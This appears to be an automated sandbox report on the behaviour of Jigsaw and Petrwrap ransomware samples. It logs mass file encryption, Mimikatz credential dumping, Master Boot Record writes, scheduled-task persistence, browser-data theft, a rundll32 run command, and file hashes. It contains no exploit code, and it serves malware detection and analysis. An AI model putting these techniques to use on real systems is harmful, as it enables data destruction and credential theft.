File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_rest.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Training.potx.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\8.png C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.fun C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe"

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Jigsaw\jigsaw.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

Network

N/A

Files

memory/2604-0-0x000007FEF535E000-0x000007FEF535F000-memory.dmp

memory/2604-1-0x0000000000460000-0x0000000000498000-memory.dmp

memory/2604-2-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/2604-6-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe

MD5 2773e3dc59472296cb0024ba7715a64e
SHA1 27d99fbca067f478bb91cdbcb92f13a828b00859
SHA256 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7
SHA512 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

memory/1860-11-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/2604-10-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-12-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-13-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-248-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun

MD5 580ee0344b7da2786da6a433a1e84893
SHA1 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e
SHA256 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513
SHA512 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\container.dat.fun

MD5 8ebcc5ca5ac09a09376801ecdd6f3792
SHA1 81187142b138e0245d5d0bc511f7c46c30df3e14
SHA256 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880
SHA512 cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650

memory/1860-2037-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/1860-2040-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

memory/2924-2041-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2924-2042-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2924-2043-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2924-2044-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1860-2045-0x000007FEF50A0000-0x000007FEF5A3D000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240419-en

Max time kernel

1799s

Max time network

1800s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\202E.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\CompareHide.doc C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\RequestMount.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
